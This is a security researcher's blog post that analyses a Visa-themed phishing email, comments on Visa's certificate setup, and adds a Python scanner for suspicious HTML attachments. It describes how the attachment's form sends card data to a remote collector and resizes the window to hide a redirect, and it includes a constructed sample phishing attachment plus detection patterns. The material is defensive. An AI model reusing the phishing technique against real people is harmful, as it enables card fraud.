Phishing getting "Verified" (Update)

Not a week passes by without me being astonished about the inventiveness of online scammers. Last week I wrote about a method used to direct the user to a Phishing page by using html attachments.

Now we are seeing a slightly altered method to direct the user to the fake URL, which made me wonder: who are they trying to fool? The email is written in absolutely terrible German that makes almost no sense to the reader. The text is so badly written that I suspect it was produced by some (really bad) automatic translation software.

As soon as the user finally understands that he has to click on the HTML attachment in order to send the form to Visa, and is daring enough to actually do that, the window below is opened (the left part of the image).

In the text the words “Activate Now” appear twice (marked with a red square). Strangely, the submit button reads “Confirm Now” and not “Activate Now”. After clicking on the button, I understood why the text is there: on the right part of the screenshot of the web page you find the exact text “Activate Now” again (also marked with a red square).

And here comes the catch: hitting the “Confirm Now” button in the first form posts the values to a server running a PHP script, which stores the data somewhere and immediately afterwards redirects the web browser to the official Visa.com page: https://verified.visa.com/aam/data/default/landing.aam?partner=default&resize=yes.

During the redirect the window is automatically resized to the size of the HTML page in the email attachment; at such a small size the URL becomes almost invisible. The scammers seem to hope that their victims don’t notice the change from the “file:///” URL to the “http://” URL in the address bar.
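The three traits described above (a form in an HTML attachment that posts to a remote host, inputs that collect card data or a PIN, and a script or event handler that shrinks the browser window) are all visible in the attachment before anyone clicks it. The following scanner, added here as an illustration and not code from the original post or from Avira, flags exactly those traits in an HTML attachment body using only the Python standard library. The finding codes, the list of sensitive field names, the quarantine rule in `is_suspicious`, and both sample attachments (including the placeholder hostname) are constructed assumptions for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Finding codes emitted by the scanner (names chosen for this example).
REMOTE_FORM = "remote_form"          # <form> posts to an http(s) host
SENSITIVE_FIELD = "sensitive_field"  # password / card / PIN style input
WINDOW_RESIZE = "window_resize"      # script or handler calls resizeTo/resizeBy

RESIZE_RE = re.compile(r"\bresize(To|By)\s*\(", re.IGNORECASE)
# Assumption: field names a card-verification phish would typically collect.
SENSITIVE_NAMES = {"password", "pin", "cvv", "cvc", "card", "cardnumber", "pan"}


class AttachmentScanner(HTMLParser):
    """Collect (code, detail) findings while parsing one HTML attachment."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_chunks = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            action = attrs.get("action", "")
            if urlsplit(action).scheme.lower() in ("http", "https"):
                self.findings.append((REMOTE_FORM, action))
        elif tag == "input":
            name = (attrs.get("name") or attrs.get("id") or "").lower()
            if attrs.get("type", "text").lower() == "password" or name in SENSITIVE_NAMES:
                self.findings.append((SENSITIVE_FIELD, name or "password"))
        elif tag == "script":
            self._in_script = True
        # Inline event handlers such as onload="window.resizeTo(...)" count as well.
        for key, value in attrs.items():
            if key.startswith("on") and RESIZE_RE.search(value):
                self.findings.append((WINDOW_RESIZE, f"{tag} {key}"))

    def handle_data(self, data):
        if self._in_script:
            self._script_chunks.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            if RESIZE_RE.search("".join(self._script_chunks)):
                self.findings.append((WINDOW_RESIZE, "script"))
            self._script_chunks = []


def scan_html_attachment(html):
    """Return the list of (code, detail) findings for one attachment body."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def is_suspicious(html):
    """Assumption: a form posting to a remote host combined with either a
    sensitive input or a window resize is enough to quarantine for review."""
    codes = {code for code, _ in scan_html_attachment(html)}
    return REMOTE_FORM in codes and bool(codes & {SENSITIVE_FIELD, WINDOW_RESIZE})


# Constructed sample resembling the attachment described in the post
# (the hostname is a placeholder, not a real indicator).
SAMPLE_ATTACHMENT = """<html><body onload="window.resizeTo(420, 300)">
<p>Activate Now</p>
<form method="post" action="http://collector.example.invalid/verify.php">
  <input name="cardnumber"><input type="password" name="pin">
  <input type="submit" value="Confirm Now">
</form></body></html>"""

# Constructed benign attachment: local form target, no credentials, no resize.
BENIGN_ATTACHMENT = """<html><body><form action="#" method="get">
  <input name="q"><input type="submit" value="Search"></form></body></html>"""

if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        print(label, is_suspicious(body), scan_html_attachment(body))
```

In a mail gateway the scanner would be run on each `text/html` attachment part before delivery; the remote-form check alone is too noisy on its own (newsletters legitimately contain forms), which is why `is_suspicious` requires a second trait before quarantining.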

During this phishing analysis, another problem became obvious, though: on the official Visa website, the URL bar shows the marking “visa.com”, indicating that the domain is what it pretends to be, as verified by a certificate. That is very nice and gives a good sense of security, despite the fact that Visa seems to have forgotten to copy the favicon.ico to the server.

By clicking on the “visa.com” name or on the favicon, the web browser shows more detailed information about the certificate. The good sense of security disappears quite fast, because you can see that everything was done somewhat unprofessionally. It is not very nice to have a certificate without an official owner; especially for financial institutions, so-called extended validation certificates (for example EV-SSL) should be used. My guess is that this was done this way in order to save some money: usually they would have to buy a separate certificate for each localized website and server (Akamai offers such a service, but it is quite expensive).

For comparison, to show how it can be done better, here is how the certificate information looks for PayPal.

You are clearly informed about who owns the certificate.

As usual, Avira anti-malware software detects these emails as phishing and also blocks the URL accordingly.

Update:

Virus Bulletin has added this technique with the name “The Responsibility Transfer” into the Spammer’s Compendium.

Sorin Mustaca
Data Security Expert